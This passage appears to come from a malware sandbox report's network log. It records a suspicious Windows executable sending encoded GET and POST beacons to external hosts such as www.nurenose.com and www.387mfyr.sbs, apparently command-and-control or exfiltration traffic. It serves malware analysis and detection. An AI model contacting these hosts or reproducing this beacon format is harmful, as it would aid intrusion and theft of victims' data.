                                                                    Data Ascii: CjezzwPWog+Nkxc8PlU0L6xQJaGBxfKdEZWYRAnAGnj2orscjteNqf8unxktBQQFP/cAYviDdTZYic9RORuZAC8iUnVHeJ+yqqwyXoV8GLHCL9TljODMuOig3gZ11kjDrl5WNtLNwh4F0gy73wq0qMb00hm5b/r8xTLOYLcT2+cvbynU0dleByVKFmNsHOv4pWRqqcOfJcBr069yozl1/LMbUY9VLIkCFOObyvnxUMrRfEpsZ3J
                                                                    Apr 24, 2024 12:30:31.938009977 CEST5156OUTData Raw: 59 45 54 2f 52 6b 38 7a 74 53 4a 58 4a 4b 6e 7a 54 68 42 79 66 62 41 74 57 73 53 53 76 6c 71 68 36 79 4a 53 75 66 4a 33 42 65 55 71 66 55 35 51 2f 79 6e 49 6d 64 48 42 68 46 74 65 34 79 65 74 44 52 4b 65 74 72 2b 65 76 78 4b 44 52 78 4b 75 56 6e
                                                                    Data Ascii: YET/Rk8ztSJXJKnzThByfbAtWsSSvlqh6yJSufJ3BeUqfU5Q/ynImdHBhFte4yetDRKetr+evxKDRxKuVnOxvl0y2yb4Bxn2SJwUy/0KIzUdHKqx8ag/ZgAeg7hg/jmak3kbs46wybfGCxYCsyvJw0tPU+W4sCYEXGWdrlyqo5LeAefGlOUxJodcxkfMo3KGoMnJa2NOPaWo1d6MRFgadmmQlJoW46WIOT29vSPLtcPuYLefTUN
                                                                    Apr 24, 2024 12:30:31.938353062 CEST10312OUTData Raw: 2b 32 36 4e 76 41 75 52 47 76 4f 41 30 67 62 71 57 35 2b 30 35 53 32 52 4b 64 49 79 78 52 43 37 62 2b 47 50 6b 76 65 74 50 76 72 4c 37 50 79 43 78 74 43 50 41 4f 73 42 32 61 72 5a 6b 58 4e 6d 63 77 6b 39 65 4e 32 78 47 75 52 79 79 4c 7a 4b 4d 4c
                                                                    Data Ascii: +26NvAuRGvOA0gbqW5+05S2RKdIyxRC7b+GPkvetPvrL7PyCxtCPAOsB2arZkXNmcwk9eN2xGuRyyLzKML3aF1dNBfBZGeq+yHe651BAUH/8r6RJmo10EgQ/n5ciIJHMd9H7P+UCFWB3BGrJQSCYsAkKBz0RDZYnN83enj/SGS/pqFfg4PY+DF6yiwaobB8KhH62k39EBOa7xlQgkev54p+wtvv0jRxu3hYIMCx3icmZnXKB056
                                                                    Apr 24, 2024 12:30:31.978468895 CEST2578OUTData Raw: 34 6e 66 65 47 47 6d 73 69 78 56 2b 59 37 41 64 36 32 31 48 77 42 6a 6b 57 57 46 33 55 4b 66 47 47 66 35 52 44 70 38 57 67 79 6e 43 31 73 73 33 59 75 2b 42 74 48 71 69 4e 77 47 6e 61 6a 64 45 6f 4a 35 57 33 58 52 61 4c 38 2f 6d 54 4a 42 67 70 6e
                                                                    Data Ascii: 4nfeGGmsixV+Y7Ad621HwBjkWWF3UKfGGf5RDp8WgynC1ss3Yu+BtHqiNwGnajdEoJ5W3XRaL8/mTJBgpnMQMbYDBlzcYl0Mjx07zUkY8vS4dI3fe24m7msRI965VRlsrxG0kA6ZjlangGXbI2p4dc57yWRwBWz0QcNePPSvYpLMkNijYnCHm1p3K+3k/itPl46M6O0jkIt6NXt+D7pAeuHfbBROUGiykVQqZlWJQRHijjQ/dZ7
                                                                    Apr 24, 2024 12:30:32.213562012 CEST2578OUTData Raw: 46 57 37 37 79 5a 4d 2b 63 39 56 43 49 42 55 31 2b 4e 62 34 47 6b 50 47 5a 2f 6e 61 6d 35 42 4f 66 54 62 7a 5a 45 4e 79 58 64 53 6d 38 33 6e 6b 47 47 37 4e 6f 4c 61 76 70 65 67 55 36 62 51 36 56 63 42 56 66 51 41 38 6c 75 75 4b 4c 78 72 6a 5a 54
                                                                    Data Ascii: FW77yZM+c9VCIBU1+Nb4GkPGZ/nam5BOfTbzZENyXdSm83nkGG7NoLavpegU6bQ6VcBVfQA8luuKLxrjZT/ffFKvMdBWzQU5NIOFwRtsBxs2XUH2J51QT2gkQFKzpDe/5RQEVydWv3FSw2CUACy1om7FNylNXfmthcFfPbPAJ/akL9iSywmupQ3IXZAkUzYXbhE0zxmx/fyB+6qPqWozMD3VyK6BqyzO7x2p+qp5aFDacTkWU46
                                                                    Apr 24, 2024 12:30:32.213618994 CEST5156OUTData Raw: 4b 37 38 52 4f 47 4c 6c 39 71 66 52 5a 43 68 4e 6b 33 37 69 69 54 34 4e 75 45 31 56 68 48 75 6e 78 62 6a 34 55 59 48 55 4c 69 42 52 64 77 65 77 79 5a 52 47 68 6b 49 67 6c 6a 30 36 35 64 4e 79 6d 79 77 6a 6e 53 70 52 37 65 63 56 49 45 63 49 49 51
                                                                    Data Ascii: K78ROGLl9qfRZChNk37iiT4NuE1VhHunxbj4UYHULiBRdwewyZRGhkIglj065dNymywjnSpR7ecVIEcIIQyAc0SakCvVA6OJRBSn6t2xC8bSvR7TbBxr7oMZjnbkxfGzQlWDvftcPU1qANQRf0QMRunFGN4H2vMrUGdAa8Puya4MAY5E2Dn6gNNINODe7mmF1Nc4UIHYp6Ar3P7dtOU0cF3qYd4kQJuriaqf/KJhHSBaV3XZbbw
                                                                    Apr 24, 2024 12:30:32.213665009 CEST5156OUTData Raw: 4b 33 76 43 65 49 70 37 51 62 57 57 71 55 79 52 62 31 64 37 41 72 72 57 4d 61 6f 37 51 77 71 73 34 72 6a 6f 62 74 33 4f 42 4f 6d 78 77 67 5a 70 57 6f 6a 79 44 53 45 50 45 56 6e 33 74 34 43 70 73 61 6b 6b 6d 7a 6f 77 77 70 48 65 37 32 66 63 79 5a
                                                                    Data Ascii: K3vCeIp7QbWWqUyRb1d7ArrWMao7Qwqs4rjobt3OBOmxwgZpWojyDSEPEVn3t4CpsakkmzowwpHe72fcyZ6eAAEnoE9vbZRFlMNnKSXWjUVKilNRZ33f076nB52zimSAQTJIH/ugcRuePxkZ/2JOrOIxlGMZynN6Wr444IizdzV0tUZ/V4B5FXy9SeU67duoEApbLNF3x7AU+TT1sdyf+FHgkZXEvREaamXINoqqf7VZi792za4
                                                                    Apr 24, 2024 12:30:32.213833094 CEST1833OUTData Raw: 31 36 56 36 50 39 32 36 69 2f 30 51 6c 46 6a 2b 4e 4c 6f 4a 73 73 46 4e 4e 6a 4e 48 4b 53 4d 33 6b 5a 6d 76 37 45 30 31 76 79 72 41 6c 50 5a 44 54 79 33 77 78 69 2b 32 6a 50 49 4b 79 78 62 59 4f 6e 61 52 55 6f 49 5a 36 6f 74 31 49 53 74 31 37 62
                                                                    Data Ascii: 16V6P926i/0QlFj+NLoJssFNNjNHKSM3kZmv7E01vyrAlPZDTy3wxi+2jPIKyxbYOnaRUoIZ6ot1ISt17boY7QHjCmDyYTBaZP9/7/U5YEK7FpK/p8yWC/sZAViLzNjbq027QpKbeG/MCqFsmHMUjETOXkR3GkSQuU9grly1Ac+MkOPwcclVUtgAYRdMAny1RayzwOJaGJz/uuVCCiW1YM3nY7sYtrq7ngcBcuuWzRzpoJOURvu


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    32192.168.11.2050277137.220.252.40807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:30:34.466295958 CEST388OUTGET /8cgp/?Xh9lX=27hjRPCyRlHKx+9Yvp9X/66HqVrlT4yXNX1Fx10RnhcFdFyjtbgqtspXt/m7h19M1tNaQu/ADV6ErOuMACLC0xl2a7R1sTqGKQn1UwmaLCfsUIitr9DM5TM=&QDnH=ERXP8 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.387mfyr.sbs
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:30:34.735280037 CEST289INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Wed, 24 Apr 2024 10:30:34 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 146
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    33192.168.11.205027891.195.240.19807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:30:40.346885920 CEST659OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 202
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.nurenose.com
                                                                    Origin: http://www.nurenose.com
                                                                    Referer: http://www.nurenose.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Raw: 58 68 39 6c 58 3d 74 4e 4f 78 54 35 49 42 72 64 36 33 53 75 55 49 61 37 5a 32 50 38 41 50 32 70 73 71 4a 5a 30 75 70 79 7a 38 68 59 75 2f 30 69 4b 6b 34 42 38 68 76 48 45 4c 71 59 57 34 43 39 47 35 45 6e 38 41 73 78 51 51 70 75 6f 58 6f 66 4d 65 67 78 48 73 4e 7a 42 67 4d 49 59 54 44 65 39 62 78 75 33 57 66 45 39 37 4b 75 6e 37 33 43 64 66 68 72 56 4c 70 4d 32 67 4d 36 69 59 4b 78 44 73 59 73 2b 47 38 66 69 58 42 33 77 31 2f 70 76 56 6b 31 77 53 31 70 6f 30 54 49 65 53 4a 4b 54 53 61 62 69 78 67 34 4e 4b 78 7a 45 4a 43 4b 72 2b 68 37 71 4d 4e 4a 52 42 65 45 35 6f 4e 50 41 63 68 65 45 42 49 51 3d 3d
                                                                    Data Ascii: Xh9lX=tNOxT5IBrd63SuUIa7Z2P8AP2psqJZ0upyz8hYu/0iKk4B8hvHELqYW4C9G5En8AsxQQpuoXofMegxHsNzBgMIYTDe9bxu3WfE97Kun73CdfhrVLpM2gM6iYKxDsYs+G8fiXB3w1/pvVk1wS1po0TIeSJKTSabixg4NKxzEJCKr+h7qMNJRBeE5oNPAcheEBIQ==
                                                                    Apr 24, 2024 12:30:40.660209894 CEST299INHTTP/1.1 405 Not Allowed
                                                                    date: Wed, 24 Apr 2024 10:30:40 GMT
                                                                    content-type: text/html
                                                                    content-length: 154
                                                                    server: NginX
                                                                    connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    34192.168.11.205027991.195.240.19807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:30:43.177387953 CEST999OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 542
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.nurenose.com
                                                                    Origin: http://www.nurenose.com
                                                                    Referer: http://www.nurenose.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Raw: 58 68 39 6c 58 3d 74 4e 4f 78 54 35 49 42 72 64 36 33 55 4f 6b 49 62 59 42 32 61 73 41 4f 71 5a 73 71 62 5a 30 71 70 79 2f 38 68 63 65 4a 30 51 65 6b 2f 6a 6b 68 75 43 77 4c 70 59 57 34 62 4e 47 32 4c 48 38 50 73 78 63 59 70 71 67 58 6f 65 6f 65 68 43 2f 73 4c 44 42 6a 45 6f 59 51 56 4f 39 61 31 75 33 63 66 44 30 51 4b 72 50 37 30 79 68 66 67 6f 39 4c 74 64 32 6e 62 4b 69 65 43 52 44 6a 4e 63 2b 45 38 66 75 66 42 33 34 50 2f 62 7a 56 6b 56 51 53 6e 35 6f 33 64 34 65 4a 47 71 53 63 4b 4b 66 32 6c 49 74 6c 68 69 64 53 46 5a 6e 79 39 35 57 31 45 62 35 71 44 33 64 79 46 75 31 54 6b 2f 46 39 49 57 77 37 72 48 74 56 53 30 47 44 4f 72 7a 55 45 6b 72 76 51 41 6e 68 73 54 75 65 66 35 64 49 4d 61 78 72 70 4f 58 56 69 79 6b 70 32 4a 6d 34 6a 49 39 74 44 36 55 78 46 6b 70 57 48 54 69 66 75 43 2f 62 33 71 67 76 6b 59 58 72 71 47 68 6d 55 62 71 77 4a 53 76 2f 55 43 4b 34 4d 70 61 6d 43 51 42 6e 45 49 58 4d 43 30 4e 76 58 34 63 7a 69 6f 56 30 39 70 66 35 59 46 4e 67 2f 68 4a 7a 66 71 32 36 71 4a 54 59 79 69 48 68 4e 48 67 57 52 43 35 57 68 49 2b 2f 4b 4c 2f 75 54 4d 41 75 6d 43 75 6b 6f 6e 76 36 59 70 50 52 4c 38 6f 45 56 57 6e 66 6e 76 2f 7a 5a 6b 67 7a 79 6b 6f 61 4e 43 6c 69 76 34 68 61 67 68 5a 4a 52 6b 31 58 64 57 4f 62 54 64 4d 51 70 4f 46 48 58 4a 52 4f 57 43 35 39 70 31 43 79 65 45 68 34 2b 5a 43 52 44 42 42 67 78 4d 52 2b 38 64 57 71 57 4e 34 52 48 4c 61 76 52 47 61 2b 33 4e 6e 4c 42 31 77 76 52 4a 6f 6f 66 6c 52 6f 72 47 72 2f 62 33 33 43 62 46 48 54 6a 36 56 73 42 43 33 76 46 5a 32 37 47 6a 72 4f 36 4d 73 34 6c 64 51 48 66 62 52 58 30 5a 5a 53 69 34 7a 58 74 5a 67 77 6c 6e 65 44 58 69 69 66 65 71 30 3d
                                                                    Data Ascii: Xh9lX=tNOxT5IBrd63UOkIbYB2asAOqZsqbZ0qpy/8hceJ0Qek/jkhuCwLpYW4bNG2LH8PsxcYpqgXoeoehC/sLDBjEoYQVO9a1u3cfD0QKrP70yhfgo9Ltd2nbKieCRDjNc+E8fufB34P/bzVkVQSn5o3d4eJGqScKKf2lItlhidSFZny95W1Eb5qD3dyFu1Tk/F9IWw7rHtVS0GDOrzUEkrvQAnhsTuef5dIMaxrpOXViykp2Jm4jI9tD6UxFkpWHTifuC/b3qgvkYXrqGhmUbqwJSv/UCK4MpamCQBnEIXMC0NvX4czioV09pf5YFNg/hJzfq26qJTYyiHhNHgWRC5WhI+/KL/uTMAumCukonv6YpPRL8oEVWnfnv/zZkgzykoaNCliv4haghZJRk1XdWObTdMQpOFHXJROWC59p1CyeEh4+ZCRDBBgxMR+8dWqWN4RHLavRGa+3NnLB1wvRJooflRorGr/b33CbFHTj6VsBC3vFZ27GjrO6Ms4ldQHfbRX0ZZSi4zXtZgwlneDXiifeq0=
                                                                    Apr 24, 2024 12:30:43.488382101 CEST299INHTTP/1.1 405 Not Allowed
                                                                    date: Wed, 24 Apr 2024 10:30:43 GMT
                                                                    content-type: text/html
                                                                    content-length: 154
                                                                    server: NginX
                                                                    connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    35192.168.11.205028091.195.240.19807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:30:46.021651030 CEST2578OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 52930
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.nurenose.com
                                                                    Origin: http://www.nurenose.com
                                                                    Referer: http://www.nurenose.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Raw: 58 68 39 6c 58 3d 74 4e 4f 78 54 35 49 42 72 64 36 33 55 4f 6b 49 62 59 42 32 61 73 41 4f 71 5a 73 71 62 5a 30 71 70 79 2f 38 68 63 65 4a 30 51 47 6b 2f 51 73 68 76 68 59 4c 6f 59 57 34 54 74 47 6d 4c 48 38 57 73 78 30 6d 70 71 6b 70 6f 64 41 65 68 52 33 73 4c 31 31 6a 52 59 59 52 61 75 39 59 78 75 33 49 66 45 39 5a 4b 76 6e 52 33 43 56 66 68 71 6c 4c 71 75 65 67 59 61 69 59 43 52 44 56 63 73 2b 54 38 65 62 41 42 33 30 50 2f 5a 48 56 72 47 6f 53 30 61 41 33 55 49 65 4f 50 4b 53 48 52 61 66 44 6c 49 70 58 68 69 63 6c 46 59 54 79 39 35 32 31 46 61 35 70 44 58 64 79 4d 4f 31 51 33 76 4a 35 49 57 64 6d 72 48 78 56 53 33 32 44 49 4c 7a 55 43 47 54 75 5a 41 6e 6e 6d 7a 76 59 53 5a 41 6b 4d 61 56 46 70 4d 62 56 69 43 67 70 31 59 6d 34 76 4b 46 74 4f 36 55 7a 61 30 70 46 63 44 69 44 75 44 54 78 33 71 41 52 6b 62 62 72 6f 69 74 6d 52 36 71 7a 64 69 76 6d 52 43 4b 78 49 70 57 36 43 51 78 37 45 49 57 52 43 32 68 76 58 6f 73 7a 73 4e 31 31 36 35 66 2b 65 46 4e 31 6c 52 4e 74 66 71 71 79 71 4a 4b 41 79 6a 54 68 4e 6e 67 57 61 42 52 58 7a 59 2b 34 49 4c 2b 33 65 73 41 35 6d 44 53 53 6f 6a 66 71 4e 4e 33 52 4b 4d 34 45 66 6d 6e 59 68 50 2f 33 51 45 67 78 6c 30 6f 61 4e 43 70 59 76 34 39 61 67 55 74 4a 4c 7a 52 58 66 46 57 62 56 64 4d 65 70 4f 45 63 58 4a 63 77 57 43 78 44 70 32 61 59 65 47 4e 34 2f 49 53 52 47 45 68 6e 6e 4d 52 42 34 64 58 79 5a 74 31 4c 48 4c 47 5a 52 47 4b 41 32 39 4c 4c 41 31 67 76 62 70 6f 72 4a 56 52 76 37 57 72 70 66 33 36 64 62 46 71 75 6a 36 78 47 42 43 66 76 41 34 33 33 64 7a 62 7a 68 71 56 76 75 64 73 72 59 4c 64 38 34 6f 51 6d 79 4c 2b 38 76 65 52 70 6c 42 47 33 54 43 4f 73 42 64 50 35 7a 56 69 57 50 4c 36 39 51 79 30 6c 79 58 51 39 53 62 6b 2f 56 79 63 51 35 4f 38 76 51 38 53 45 67 43 4c 48 62 74 49 62 66 50 2b 54 38 38 6a 51 73 43 58 76 6d 73 7a 4d 73 6f 52 42 46 5a 39 4a 61 79 79 52 41 33 55 57 32 32 4e 77 39 37 74 32 6c 34 65 32 59 64 62 39 4d 70 67 2f 45 62 55 67 35 51 72 4d 44 35 4d 2f 38 77 69 76 50 39 48 55 77 53 41 62 47 54 45 65 32 79 45 45 74 70 4a 6c 41 74 78 37 44 76 34 36 38 6c 6c 45 2b 58 6e 58 71 4e 46 51 65 39 36 6d 74 74 62 4d 44 63 56 39 69 44 67 43 58 33 2f 64 59 76 61 39 4b 52 36 32 53 56 34 76 58 31 38 6d 4e 2f 45 5a 51 58 4a 47 67 32 4d 2b 59 70 49 67 4f 4e 30 4e 74 38 76 35 6f 36 63 64 62 70 7a 46 6e 70 36 38 56 6a 42 65 55 2b 68 37 64 70 79 62 6f 36 6a 62 6b 62 72 48 55 76 71 54 33 2b 57 52 71 4d 43 61 56 56 33 2f 50 66 31 41 4c 4a 37 31 4d 50 72 49 7a 64 55 53 43 47 59 57 44 31 4d 58 52 63 44 30 41 46 76 45 34 47 45 66 79 6b 6c 4c 37 59 55 63 56 50 32 30 58 51 36 77 48 79 70 53 57 56 56 48 66 4d 39 70 6f 45 74 6f 34 57 38 46 5a 2f 6f 56 32 56 42 4e 63 58 71 31 30 32 4b 63 44 41 47 6a 74 48 4b 6b 6e 57 4a 78 50 74 6c 78 37 77 39 38 35 59 48 42 45 77 32 34 54 54 2f 32 32 58 4d 6c 2b 4a 6e 34 4a 63 7a 77 46 79 2b 4e 63 45 6a 61 66 4b 72 30 2f 45 6b 33 7a 33 73 52 32 67 51 6f 51 6c 78 36 61 47 68 31 33 6d 76 37 77 47 76 64 31 4e 6e 43 32 58 77 62 4a 4f 43 34 41 6c 56 41 6a 51 66 6e 75 4c 75 62 58 66 66 67 2b 53 76 65 39 46 47 47 2b 58 33 62 75 52 41 58 43 78 64 56 35 64 39 6d 2b 58 2b 34 62 5a 69 50 67 75 6a 30 31 2f 2f 65 74 5a 47 7a 45 47 49 41 37 73 49 38 4f 47 55 47 77 36 55 35 77 6d 76 54 37 55 78 45 54 36 7a 48 58 38 2f 6d 57 66 51 79 4c 44 35 2f 41 6a 56 72 64 41 38 42 52 70 31 72 33 78 56 4c 66 54 6d 41 6d 79 30 74 4d 65 49 74 32 71 33 52 48 41 50 38 35 70 39 75 57 41 48 48 77 76 65 50 72 68 5a 56 6e 64 62 41 61 56 32 63 67 43 4f 67 47 4e 68 79 55 4b 53 57 31 54 7a 47 72 62 58 53 66 54 58 39 30 53 34 71 78 61 58 69 42 50 68 57 64 4e 37 4b 2f 6f 61 4a 45 49 79 67 71 51 76 62 77 64 4a 76 44 2f 61 6e 32 57 70 35 53 73 6a 6a 41 37 2f 2b 4d 69 47 7a 50 6a 31 78 32 65 39 62 58 49 47 76 39 4d 35 2b 78 42 37 44 6d 54 38 32 4a 64 4f 4c 69 63 73 30 4f 63 5a 6a 39 57 34 39 4b 34 42 70 33 30 34 6d 2b 73 4e 59 55 49 78 53 41 6c 71 45 62 76 2b 2f 47 63 70 36 64 44 51 33 71 75 38 75 70 61 77 70 72 37 45 58 47 71 66 45 75 73 4a 64 75 77 31 79 49 65 6d 53 30 76 2b 31 32 75 43 4d 44 6b 69 4f 52 6b 2b 79 39 62 5a 41 75 2f 49 38 61 31 4f 44 49 54 58 4b 47 52 59 64 66 4a 45 54 38 36 4a 4f 56
                                                                    Data Ascii: Xh9lX=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
                                                                    Apr 24, 2024 12:30:46.021708965 CEST5156OUTData Raw: 4d 6c 58 62 74 66 59 5a 49 68 33 4c 4c 56 39 32 39 64 6d 31 57 53 4b 4c 33 36 2f 69 42 47 30 38 4c 42 52 31 61 59 75 7a 58 42 6e 4e 45 4b 56 2f 69 4e 32 46 32 57 67 4e 57 64 38 71 73 4c 45 50 38 37 4f 41 73 66 53 66 69 6c 53 37 2f 59 43 6f 33 55
